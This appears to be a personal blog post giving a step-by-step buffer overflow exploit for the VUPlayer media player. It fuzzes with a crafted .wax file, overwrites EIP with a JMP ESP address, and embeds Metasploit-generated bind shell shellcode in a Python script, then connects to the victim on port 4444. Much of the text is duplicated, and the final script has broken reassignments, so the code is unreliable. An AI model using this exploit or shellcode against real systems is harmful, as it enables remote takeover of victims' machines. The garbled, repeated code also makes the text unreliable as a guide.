oke this time wanna try to exploit vuplayer
first step
patterns of attack.
In this time wanna try to see it's can be buffer overflow. a make on notepad try too write character "a" so much. if it's crash we can see it's can be overflow.
and than when i were open it's. VUPlayer lose it's mead it's cam be exploid.
second step
make fuzzer
i try to make fuzzer on backtrack using python program.
#!/usr/bin/python
spirit = "spirit.wax"
smile = "A" * 100000
file = open(spirit,'a')
file.write(smile)
print "created successfully"
file.close()
spirit = "spirit.wax"
smile = "A" * 100000
file = open(spirit,'a')
file.write(smile)
print "created successfully"
file.close()
now we compile it, and we ged a file spirit.wax
so now try to open spirit.wax and more to see is't, if it's lose our fuzzer it's success.
when i pres open VUPlayer lose.
third step
using pattern create
it's make a struktur charakter A.
change this fuzzer
smile = "A" * 100000
smile = "result of pattern create put on quotes"
smile = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7-------"
now compile it's and we get a use file.
oke now open ollyBbg and run VUPlayer and open spirit.wax and see whow it's is crash.
fourth step
using pattern offset
to find the value of EIP and ESP offset
fifth step
change the value of EIP register
customization fuzzer
remove smile=""result of patter_create"
add
smile="A" * 1012
add
smile="A" * 1012
smile+="\xAA\xBB\xCC\xDD"
compile it'
and open using ollyDbg and see EIP register was changed DDCCBBAA
sixth step
trying to do the writing on the ESP
ESP is a storage area in the temporal data memory (stack)
customization fuzzer
add
smile+="A" * (1016- len(smile))
smile+="\xCC" * (100000 - len(smile))
ESP is a storage area in the temporal data memory (stack)
customization fuzzer
add
smile+="A" * (1016- len(smile))
smile+="\xCC" * (100000 - len(smile))
compile it and open using ollyDbg
seventh step
JMP ESP
JMP ESP to find out the address in the application memory
change the value of the EIP register to the address of the JMP ESP file that resides in shell32.dll
oke now we fine address of JMP ESP.
choose view on ollyDbg - Executabale Moduls it's will open all of Executabale Moduls.
and will open windows input command
type JMP ESP
we find address 7C9D30EB FFE4 JMP ESP
oke now
customization fuzzer
change varibael of this junk+
junk+="\xAA\xBB\xCC\xDD" using address of JMP ESP
junk+="\xEB\x30\x9D\x7C"
compile it's and run on ollyDbg.
last step
run msfweb
open browser type 127.0.0.1:55555 on url.
and
customization fuzzer
#!/usr/bin/python
spirit = "spirit.wax"
smile = "A" * 1012
smile+="\xEB\x30\x9D\x7C"
smile = "A" * 16
smile = ("\x29\xc9\xb1\x51\xdb\xd3\xbb\x1d\xf7\x7f\x2d\xd9\x74\x24\xf4\x5e"
"\x31\x5e\x13\x03\x5e\x13\x83\xf3\x0b\x9d\xd8\xf7\x9e\x89\x6e\xef"
"\xa6\xb1\x8e\x10\x38\xc5\x1d\xca\x9d\x52\x98\x2e\x55\x18\x26\x36"
"\x68\x0e\xa3\x89\x72\x5b\xeb\x35\x82\xb0\x5d\xbe\xb0\xcd\x5f\x2e"
"\x89\x11\xc6\x02\x6e\x51\x8d\x5d\xae\x98\x63\x60\xf2\xf6\x88\x59"
"\xa6\x2c\x59\xe8\xa3\xa6\xc6\x36\x2d\x52\x9e\xbd\x21\xef\xd4\x9e"
"\x25\xee\x01\x23\x7a\x7b\x5c\x4f\xa6\x67\x3e\x4c\x97\x4c\xa4\xd9"
"\x9b\x42\xae\x9d\x17\x28\xc0\x01\x85\xa5\x61\x31\x8b\xd1\xef\x0f"
"\x3d\xce\xa0\x70\x97\x68\x12\xe8\x70\x46\xa6\x9c\xf7\xdb\xf4\x03"
"\xac\xe4\x29\xd3\x87\xf6\x36\x18\x48\xf6\x11\x01\xe1\xed\xf8\x3c"
"\x1c\xe5\x06\x6b\xb5\xf4\xf9\x43\x21\x20\x0c\x96\x1f\x85\xf0\x8e"
"\x33\x79\x5c\x7d\xe7\x3e\x31\xc2\x54\x3e\x65\xa2\x32\xd1\xda\x4c"
"\x90\x58\x03\x05\x7e\xff\xde\x55\xb8\xa8\x21\x43\x2c\x47\x8f\x3e"
"\x4e\xb7\x47\x64\x1d\x16\x71\x33\xa1\xb1\xd2\xee\xa2\xee\xbd\xf5"
"\x14\x89\x77\xa2\x59\x43\xd7\x18\xf2\x39\x27\x70\x69\xa9\x30\x09"
"\x48\x53\xe8\x16\x82\xf1\xe9\x38\x4d\x90\x71\xde\xfa\x07\x17\x97"
"\x1e\xad\xb7\xfe\xc9\xfe\xb1\xe7\x60\xbb\x48\x05\x45\x83\xb8\x63"
"\x58\x41\x12\x8d\xe7\x6a\xff\xfc\x92\x4a\x54\x55\xc9\xc3\xd8\x57"
"\xbd\x02\xe2\xd2\x86\xd5\xca\x47\x50\x78\xa2\x26\x0f\x16\x45\x99"
"\xfe\xb3\x14\xe6\xd1\x54\x3a\xc1\xd7\x6a\x17\x0e\x01\x18\x67\x0f"
"\x99\x22\x47\x64\xb1\x20\xeb\xbe\x5a\x26\x3a\x6c\x5c\x08\xab\xee"
"\x7a\x4b\x5f\x5d\x84\x5a\x5f\xb1")
file = open(spirit,'a')
file.write(smile)
print "created successfully"
file.close()
compile it and open it's using VUPlayer without ollyDbg
junk+="\xAA\xBB\xCC\xDD" using address of JMP ESP
junk+="\xEB\x30\x9D\x7C"
compile it's and run on ollyDbg.
last step
run msfweb
open browser type 127.0.0.1:55555 on url.
select: pyload
the filter module select: os :: win32
select: windows bin shell
select: windows bin shell
it will display the windows bin shell and fill in
process on the DATA
0x00 0x0a 0x0d Restricted Characters
msf :: encoder :: shikatagani
process on the DATA
0x00 0x0a 0x0d Restricted Characters
msf :: encoder :: shikatagani
press generate payload
and will open shell codeand
customization fuzzer
#!/usr/bin/python
spirit = "spirit.wax"
smile = "A" * 1012
smile+="\xEB\x30\x9D\x7C"
smile = "A" * 16
smile = ("\x29\xc9\xb1\x51\xdb\xd3\xbb\x1d\xf7\x7f\x2d\xd9\x74\x24\xf4\x5e"
"\x31\x5e\x13\x03\x5e\x13\x83\xf3\x0b\x9d\xd8\xf7\x9e\x89\x6e\xef"
"\xa6\xb1\x8e\x10\x38\xc5\x1d\xca\x9d\x52\x98\x2e\x55\x18\x26\x36"
"\x68\x0e\xa3\x89\x72\x5b\xeb\x35\x82\xb0\x5d\xbe\xb0\xcd\x5f\x2e"
"\x89\x11\xc6\x02\x6e\x51\x8d\x5d\xae\x98\x63\x60\xf2\xf6\x88\x59"
"\xa6\x2c\x59\xe8\xa3\xa6\xc6\x36\x2d\x52\x9e\xbd\x21\xef\xd4\x9e"
"\x25\xee\x01\x23\x7a\x7b\x5c\x4f\xa6\x67\x3e\x4c\x97\x4c\xa4\xd9"
"\x9b\x42\xae\x9d\x17\x28\xc0\x01\x85\xa5\x61\x31\x8b\xd1\xef\x0f"
"\x3d\xce\xa0\x70\x97\x68\x12\xe8\x70\x46\xa6\x9c\xf7\xdb\xf4\x03"
"\xac\xe4\x29\xd3\x87\xf6\x36\x18\x48\xf6\x11\x01\xe1\xed\xf8\x3c"
"\x1c\xe5\x06\x6b\xb5\xf4\xf9\x43\x21\x20\x0c\x96\x1f\x85\xf0\x8e"
"\x33\x79\x5c\x7d\xe7\x3e\x31\xc2\x54\x3e\x65\xa2\x32\xd1\xda\x4c"
"\x90\x58\x03\x05\x7e\xff\xde\x55\xb8\xa8\x21\x43\x2c\x47\x8f\x3e"
"\x4e\xb7\x47\x64\x1d\x16\x71\x33\xa1\xb1\xd2\xee\xa2\xee\xbd\xf5"
"\x14\x89\x77\xa2\x59\x43\xd7\x18\xf2\x39\x27\x70\x69\xa9\x30\x09"
"\x48\x53\xe8\x16\x82\xf1\xe9\x38\x4d\x90\x71\xde\xfa\x07\x17\x97"
"\x1e\xad\xb7\xfe\xc9\xfe\xb1\xe7\x60\xbb\x48\x05\x45\x83\xb8\x63"
"\x58\x41\x12\x8d\xe7\x6a\xff\xfc\x92\x4a\x54\x55\xc9\xc3\xd8\x57"
"\xbd\x02\xe2\xd2\x86\xd5\xca\x47\x50\x78\xa2\x26\x0f\x16\x45\x99"
"\xfe\xb3\x14\xe6\xd1\x54\x3a\xc1\xd7\x6a\x17\x0e\x01\x18\x67\x0f"
"\x99\x22\x47\x64\xb1\x20\xeb\xbe\x5a\x26\x3a\x6c\x5c\x08\xab\xee"
"\x7a\x4b\x5f\x5d\x84\x5a\x5f\xb1")
file = open(spirit,'a')
file.write(smile)
print "created successfully"
file.close()
compile it and open it's using VUPlayer without ollyDbg
oke now open console and type
root@bt:~# telnet 192.168.43.2 4444 enter and see what happan..
we can exploit it.
root@bt:~# telnet 192.168.43.2 4444 enter and see what happan..
@keep smile & spriit
be fun
Tidak ada komentar:
Posting Komentar